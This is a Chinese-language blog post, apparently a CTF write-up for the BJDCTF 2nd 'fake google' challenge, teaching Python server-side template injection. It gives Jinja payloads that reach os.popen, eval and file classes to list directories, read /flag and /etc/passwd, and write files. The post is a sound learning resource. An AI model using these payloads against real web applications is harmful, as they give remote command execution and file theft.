<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="什么是模板&amp;amp;模板注入SSTI(server-side template injection)小学的时候拿别人的好词好句，套在我们自己的作文里，此时我们的作文就相当于模板，而别人的好词好句就相当于传递进模板的内容。
Python SSTI知识点在Python的ssti中，大部分是依靠基类-&amp;g">
    

    <!--Author-->
    
        <meta name="author" content="0xEaS">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="从一道题目浅谈SSTi"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="船到桥头自然直"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>从一道题目浅谈SSTi - 船到桥头自然直</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2021/03/19/%E4%BB%8E%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E6%B5%85%E8%B0%88SSTi/">
                从一道题目浅谈SSTi
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2021-03-19</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h3 id="什么是模板-amp-模板注入SSTI-server-side-template-injection"><a href="#什么是模板-amp-模板注入SSTI-server-side-template-injection" class="headerlink" title="什么是模板&amp;模板注入SSTI(server-side template injection)"></a>什么是模板&amp;模板注入SSTI(server-side template injection)</h3><p>小学的时候拿别人的好词好句，套在我们自己的作文里，此时我们的作文就相当于模板，而别人的好词好句就相当于传递进模板的内容。</p>
<h3 id="Python-SSTI知识点"><a href="#Python-SSTI知识点" class="headerlink" title="Python SSTI知识点"></a>Python SSTI知识点</h3><p>在Python的ssti中，大部分是依靠基类-&gt;子类-&gt;危险函数的方式来利用ssti，接下来讲几个知识点。</p>
<ul>
<li><p><code>__class__</code></p>
<p>万物皆对象，而<strong>class</strong>用于返回该对象所属的类，比如某个字符串，他的对象为字符串对象，而其所属的类为<code>&lt;class &#39;str&#39;&gt;</code>。</p>
</li>
<li><p><code>__bases__</code></p>
<p>以元组的形式返回一个类所直接继承的类。</p>
</li>
<li><p><code>__base__</code></p>
<p>以字符串返回一个类所直接继承的类。</p>
</li>
<li><p><code>__mro__</code></p>
<p>返回解析方法调用的顺序。</p>
</li>
<li><p><code>__subclasses__()</code></p>
</li>
</ul>
<p>​       获取类的所有子类。</p>
<ul>
<li><p><strong><code>__init__</code></strong></p>
<p>所有的可被当作模块导入的都包含 <code>__init__</code>方法，通过此方法来调用 <code>__globals__</code>方法</p>
</li>
<li><p><strong><code>__globals__</code></strong></p>
<p>所有函数都会有一个 <code>__globals__</code> 属性， 用于获取当前空间下可使用的模块、方法及其所有变量，结果是一个字典。</p>
<p><strong><code>__builtins__</code></strong></p>
<p><strong>在pyton2中为 <code>__builtins__</code> 和 <code>__builtin__</code></strong></p>
<p>这里 <code>__builtins__</code> 是内建名称空间，是这个模块本身定义的一个名称空间，在这个内建名称空间中存在一些我们经常用到的内置函数（即不需要导入包即可调用的函数）如：print()、str()还包括一些异常和其他属性。</p>
<p>而 <code>__builtins__</code> 实际上是一个指向或者说引用 <code>__builtin__</code> 的（有点类似于软链接），而真正BIF在被定义时是在 <code>__builtin__</code> 模块中进行的。</p>
<p><strong>在python3中为 <code>__builtins__</code> 和 <code>builtins</code></strong></p>
<p>这里只不过 <code>builtins</code> 代替的 <code>__builtin__</code></p>
<p>在python中有一些BIF（内置函数）是可以直接调用的，比如str(), print()等，这些函数可以通过 <code>dir(__builtins__)</code> 可以查到。</p>
<p><img src="/images/40.png"></p>
</li>
</ul>
<h3 id="查询都哪些子类调用了-builtins-每个版本的python，子类不一样"><a href="#查询都哪些子类调用了-builtins-每个版本的python，子类不一样" class="headerlink" title="查询都哪些子类调用了__builtins__(每个版本的python，子类不一样)"></a>查询都哪些子类调用了<code>__builtins__</code>(每个版本的python，子类不一样)</h3><pre class=" language-python"><code class="language-python">search <span class="token operator">=</span> <span class="token string">'__builtins__'</span>   
num <span class="token operator">=</span> <span class="token operator">-</span><span class="token number">1</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>__class__<span class="token punctuation">.</span>__bases__<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">.</span>__subclasses__<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    num <span class="token operator">+=</span> <span class="token number">1</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> search <span class="token keyword">in</span> i<span class="token punctuation">.</span>__init__<span class="token punctuation">.</span>__globals__<span class="token punctuation">.</span>keys<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> num<span class="token punctuation">)</span>
    <span class="token keyword">except</span><span class="token punctuation">:</span>
        <span class="token keyword">pass</span></code></pre>
<p>在SSTI中，我们要做的无非就两个：</p>
<ul>
<li>执行命令</li>
<li>获取文件内容</li>
</ul>
<h3 id="BJDCTF-2nd-fake-google"><a href="#BJDCTF-2nd-fake-google" class="headerlink" title="[BJDCTF 2nd]fake google"></a>[BJDCTF 2nd]fake google</h3><p>直接回车搜索出现参数name</p>
<p><img src="/images/34.png"></p>
<p>输入1，回显出1。猜测是模板注入。</p>
<pre><code>payload=&#123;&#123;6*6&#125;&#125;   回显36，存在模板注入。</code></pre>
<p><img src="/images/35.png"></p>
<p>注入思路，虽然当前的类底下可能没有可以执行命令的方法，但可以找到它的基类下的其他子类，进行命令执行。</p>
<pre><code>payload=&#123;&#123;''.__class__&#125;&#125;</code></pre>
<p>回显对象所对应的类，这里是字符型。当然前面的‘’可以换成其他的，像（），[]等。</p>
<p><img src="/images/36.png"></p>
<p>下一步找到类所对应的基类object</p>
<pre><code>payload=&#123;&#123;''.__class__.__mro__&#125;&#125;  注：除了mro 还可以使用base 和 bases</code></pre>
<p><img src="/images/37.png"></p>
<p>下一步找到其底下的所有子类</p>
<pre><code>payload=&#123;&#123;''.__class__.__mro__[1].__subclasses__()&#125;&#125;</code></pre>
<p><img src="/images/38.png"></p>
<p>接下来就是找能执行命令或者可以读取文件的类就可以了，重点关注os/file这些关键字。例如file类和os._wrap_close类</p>
<pre><code>payload=&#123;&#123;''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls /').read()&#125;&#125;</code></pre>
<p><img src="/images/39.png"></p>
<p>最后cat下就行</p>
<pre><code>payload=&#123;&#123;''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()&#125;&#125;</code></pre>
<h3 id="其他payload"><a href="#其他payload" class="headerlink" title="其他payload"></a>其他payload</h3><p>#threading.Semaphore</p>
<pre><code>&#123;&#123;().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()&#125;&#125;</code></pre>
<p>#os._wrap_close</p>
<pre><code>&#123;&#123;"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()&#125;&#125;</code></pre>
<p>#warnings.catch_warnings</p>
<pre><code>&#123;&#123;''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")&#125;&#125;</code></pre>
<p>#file</p>
<pre><code>&#123;&#123;().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()&#125;&#125;
&#123;&#123;().__class__.__bases__[0].__subclasses__()[40]('/tmp/..','w').write()&#125;&#125;</code></pre>
<h4 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h4><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6885#toc-1">https://xz.aliyun.com/t/6885#toc-1</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/226900">https://www.anquanke.com/post/id/226900</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/TM_1024/article/details/107237455?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161614309216780265430236%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=161614309216780265430236&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-107237455.pc_search_result_before_js&amp;utm_term=BJDCTF+2nd%5Dfake+google">https://blog.csdn.net/TM_1024/article/details/107237455?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161614309216780265430236%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=161614309216780265430236&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-107237455.pc_search_result_before_js&amp;utm_term=BJDCTF+2nd%5Dfake+google</a></p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2022/03/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-NTLM-Relay%E6%94%BB%E5%87%BB/">内网渗透篇-NTLM Relay攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/03/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9D%9E%E7%BA%A6%E6%9D%9F-%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB/">内网渗透篇-非约束/约束委派攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/24/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%AF%87-%E9%9A%A7%E9%81%93%E4%BB%A3%E7%90%86/">内网渗透篇-隧道代理</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2022/02/20/Thinkphp6-0-12LTS%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">Thinkphp6.0.12LTS反序列化漏洞分析</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>